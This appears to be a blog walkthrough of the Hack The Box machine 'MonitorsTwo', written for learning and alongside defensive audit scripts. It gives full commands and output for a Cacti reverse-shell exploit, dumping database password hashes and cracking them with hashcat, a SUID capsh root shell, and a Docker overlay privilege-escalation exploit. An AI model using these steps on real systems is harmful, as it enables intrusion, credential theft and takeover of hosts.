The Be Sure Blog


MonitorsTwo: Use two exploits, crack the BCrypt hash and escalate privileges

posted on 19.8.2023 by Below Surface in "Hack The Box"

Let's start with a port scan:

sudo nmap -sCV 10.10.11.211

Relevant output:

PORT  STATE SERVICE VERSION
22/tcp open ssh    OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|  3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|  256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http   nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let's paste the IP address into a browser and visit the website. The login page shows that Cacti v1.2.22 is used. A short Google search shows us that there is a public exploit for CVE-2022-46169 in that version, which should give us a basic reverse shell (https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22).

Step 1: Start a Netcat listener on port 443

ncat -lvnp 443

Then, in another terminal window (replace "ip" with the target machine's IP address; LHOST is your own IP address, which the reverse shell connects back to):

git clone https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22.git
cd CVE-2022-46169-CACTI-1.2.22
python3 CVE-2022-46169.py  -u http://ip --LHOST=10.10.14.102 --LPORT=443

Output:

Checking...
The target is vulnerable. Exploiting...
Bruteforcing the host_id and local_data_ids
Bruteforce Success!!

And in the Netcat terminal, we get the incoming connection:

Ncat: Connection from 10.10.11.211:52408.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@50bca5e748b0:/var/www/html$ whoami
whoami
www-data

Running the command

ls -la /

shows us that we seem to be inside a Docker container. There is also a file called "entrypoint.sh" in the root directory:

cat /entrypoint.sh

reveals:

#!/bin/bash
set -ex
wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
   mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
   mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
   mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi
chown www-data:www-data -R /var/www/html
# first arg is `-f` or `--some-option`
if [ "${1#-}" != "$1" ]; then
       set -- apache2-foreground "$@"
fi
exec "$@"

The script contains the MySQL root credentials. Run:

mysql --host=db --user=root --password=root cacti -e "show tables"

Then we want to view the table "user_auth":

mysql --host=db --user=root --password=root cacti -e "select * from user_auth"

Success, we got credentials:

username: admin
password: $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC
username: guest
password: 43e9a4ab75570f5b
username: marcus
password: $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C

Asking ChatGPT about the password hashes of the users admin and marcus reveals that they are bcrypt hashes (the $2y$10$ prefix marks bcrypt with cost factor 10), which are slow and therefore hard to crack.

Let's try to crack the password for marcus with hashcat (-m 3200 is the bcrypt mode):

hashcat -a 0 -m 3200 '$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C' /usr/share/wordlists/rockyou.txt

Success!

$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C:funkymonkey

Now log in via SSH as marcus with the recovered password:

ssh marcus@10.10.11.211
password: funkymonkey

We are logged in!

cat user.txt


Time for privilege escalation. Since we know that the www-data user of our reverse shell seems to be inside a Docker container, we gather further information about the Docker installation:

docker -v
Docker version 20.10.5+dfsg1, build 55c4c88

Google provides us with an exploit for Docker 20.10.5, CVE-2021-41091 (https://github.com/UncleJ4ck/CVE-2021-41091). However, this exploit needs a setuid binary inside the container, so we first have to set the setuid bit on /bin/bash there.

In the www-data reverse shell, run:

find / -perm -u=s -type f 2>/dev/null

Outputs:

/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/sbin/capsh
/bin/mount
/bin/umount
/bin/su

On GTFOBins we find a SUID entry for "capsh", which lets us spawn a root shell inside the container:

cd /sbin
./capsh --gid=0 --uid=0 --
whoami

-> root

Now we can give SUID permissions to "/bin/bash"

chmod u+s /bin/bash
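From the defender's side, the two steps above (a setuid capsh that should not be there, and a freshly setuid /bin/bash) are exactly what a setuid baseline check catches. The following Python script is an added example for this write-up and is not code from the original post; it takes the kind of listing that `find / -perm -u=s -type f` prints, compares it with an allowlist of setuid files expected on the image, and separately flags binaries that can set an arbitrary uid or start an unrestricted shell. The baseline, the `NEVER_SUID` set and the extra `/opt/backup/runbackup` path in the sample are assumptions made for illustration.

```python
"""Audit setuid binaries against a baseline (added example, not from the post)."""
import os
import stat

# Setuid files expected on a stock Ubuntu-based image (illustrative baseline;
# generate a real one from a known-good image, not from a running container).
EXPECTED_SUID = {
    "/usr/bin/gpasswd", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/newgrp", "/bin/mount", "/bin/umount", "/bin/su",
}

# Programs that must never be setuid: they can set an arbitrary uid/gid or
# start an unrestricted shell, which turns the bit into a root shell.
NEVER_SUID = {"capsh", "bash", "sh", "dash", "zsh", "python3", "perl"}


def audit_suid(paths):
    """Split setuid paths into (unexpected, dangerous) lists.

    `unexpected` holds every path missing from the baseline; `dangerous`
    holds paths whose basename is a known shell or capability tool, whether
    or not the baseline lists them.
    """
    unexpected, dangerous = [], []
    for path in paths:
        name = os.path.basename(path)
        if name in NEVER_SUID:
            dangerous.append(path)
        if path not in EXPECTED_SUID:
            unexpected.append(path)
    return unexpected, dangerous


def parse_find_output(text):
    """Turn the plain-text output of find into a list of paths."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def scan_suid(root="/"):
    """Live equivalent of the find command: walk root and collect setuid files."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for f in files:
            p = os.path.join(dirpath, f)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(p)
    return found


# Constructed sample: the listing from the write-up, plus /bin/bash after
# `chmod u+s /bin/bash`, plus an assumed custom path of unknown purpose.
SAMPLE_FIND_OUTPUT = """\
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/sbin/capsh
/bin/mount
/bin/umount
/bin/su
/bin/bash
/opt/backup/runbackup
"""

if __name__ == "__main__":
    unexpected, dangerous = audit_suid(parse_find_output(SAMPLE_FIND_OUTPUT))
    print("not in baseline:", unexpected)
    print("shell/capability tools:", dangerous)
```

Run inside a container image as `scan_suid("/")` to produce the live list, or feed it the saved output of the find command; anything in the `dangerous` list is worth an alert regardless of what the baseline says, because a setuid shell is the precondition for the host-side step that follows.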


Now log into the server as marcus via SSH again, or use the open connection if you still have it.

mkdir temp
nano myexp.sh

Paste the code from

https://github.com/UncleJ4ck/CVE-2021-41091/blob/main/exp.sh

Then save and exit the editor, run:

bash myexp.sh
type "yes"

Relevant output:

[!] Rooted !
[>] Current Vulnerable Path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged

Run:

cd /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin
./bash -p
whoami

-> root

cd /root
cat root.txt

Finished!


This did not lead anywhere, but is nice to know:

Analyzing the hash of the user "guest" reveals:

hashid 43e9a4ab75570f5b
Analyzing '43e9a4ab75570f5b'
[+] MySQL323

So, let's try this quickly (-m 200 for MySQL323):

hashcat -a 0 -m 200 '43e9a4ab75570f5b' /usr/share/wordlists/rockyou.txt

Success!

43e9a4ab75570f5b:admin

So:

username: guest
password: admin

The credentials do not work, so they are not relevant for this machine.
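The dump above mixes two hash formats, and the difference is the whole story of why one cracked in seconds and the other needed a bcrypt run: the Python script below is an added example for this write-up (not code from the original post or from Cacti) that classifies each `user_auth` hash, reports the bcrypt cost field, and flags the 16-hex-character legacy MySQL323 format as unsalted. To show why that format is weak it reimplements `OLD_PASSWORD()`, the documented MySQL 3.23 algorithm, and checks a single candidate against the guest hash. The `USER_AUTH_ROWS` dictionary is constructed from the hashes shown in this post; the cost threshold of 10 is an assumption.

```python
"""Classify Cacti user_auth password hashes (added example, not from the post)."""
import re

# Modular-crypt bcrypt: $2<variant>$<cost>$<22-char salt><31-char hash>.
BCRYPT_RE = re.compile(r"^\$2[abxy]\$(\d{2})\$[./A-Za-z0-9]{53}$")
# MySQL 3.23 OLD_PASSWORD() output: 16 lowercase hex characters, no salt.
MYSQL323_RE = re.compile(r"^[0-9a-f]{16}$")


def classify(stored_hash):
    """Return (algorithm, cost, verdict) for one stored password hash."""
    m = BCRYPT_RE.match(stored_hash)
    if m:
        cost = int(m.group(1))
        # 2**cost key-setup rounds per guess; 10 is used as the floor here (assumption).
        verdict = "ok" if cost >= 10 else "raise bcrypt cost"
        return "bcrypt", cost, verdict
    if MYSQL323_RE.match(stored_hash):
        return "mysql323", None, "legacy OLD_PASSWORD(): unsalted, rehash on next login"
    return "unknown", None, "inspect manually"


def mysql323(password):
    """MySQL OLD_PASSWORD(): two 31-bit words from a few ALU ops per byte,
    no salt, spaces and tabs skipped. Cheap enough that a wordlist run costs
    almost nothing, which is why classify() flags the format."""
    nr, add, nr2 = 1345345333, 7, 0x12345671
    for tmp in password.encode("utf-8"):
        if tmp in (0x20, 0x09):
            continue
        nr = (nr ^ ((((nr & 63) + add) * tmp) + (nr << 8))) & 0xFFFFFFFF
        nr2 = (nr2 + ((nr2 << 8) ^ nr)) & 0xFFFFFFFF
        add += tmp
    return "%08x%08x" % (nr & 0x7FFFFFFF, nr2 & 0x7FFFFFFF)


def matches_legacy(stored_hash, candidate):
    """True if stored_hash is MySQL323 and equals OLD_PASSWORD(candidate)."""
    return MYSQL323_RE.match(stored_hash) is not None and mysql323(candidate) == stored_hash


def audit(rows):
    """Map username -> (algorithm, cost, verdict) for every row of the dump."""
    return {user: classify(h) for user, h in rows.items()}


# Constructed from the user_auth rows shown in the write-up.
USER_AUTH_ROWS = {
    "admin": "$2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC",
    "guest": "43e9a4ab75570f5b",
    "marcus": "$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C",
}

if __name__ == "__main__":
    for user, (alg, cost, verdict) in audit(USER_AUTH_ROWS).items():
        print(f"{user:8} {alg:9} cost={cost} {verdict}")
    print("guest hash is OLD_PASSWORD('admin'):",
          matches_legacy(USER_AUTH_ROWS["guest"], "admin"))
```

The point of the audit is the verdict column: a bcrypt row with an adequate cost is fine to keep, while any MySQL323 row should be re-hashed at the user's next login (or the account disabled, as the unused guest account here arguably should be), because the function above shows there is no salt and no work factor standing between a leaked dump and the plaintext.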

Tags:

hack the box
docker
exploits
bash
privilege escalation
hashcat
bcrypt hash
bcrypt crack

Sources:

https://app.hackthebox.com/machines/MonitorsTwo
https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22
https://www.linkedin.com/pulse/htb-monitorstwo-writeup-divyanshu-sharma
https://github.com/UncleJ4ck/CVE-2021-41091
https://gtfobins.github.io/gtfobins/capsh/#suid
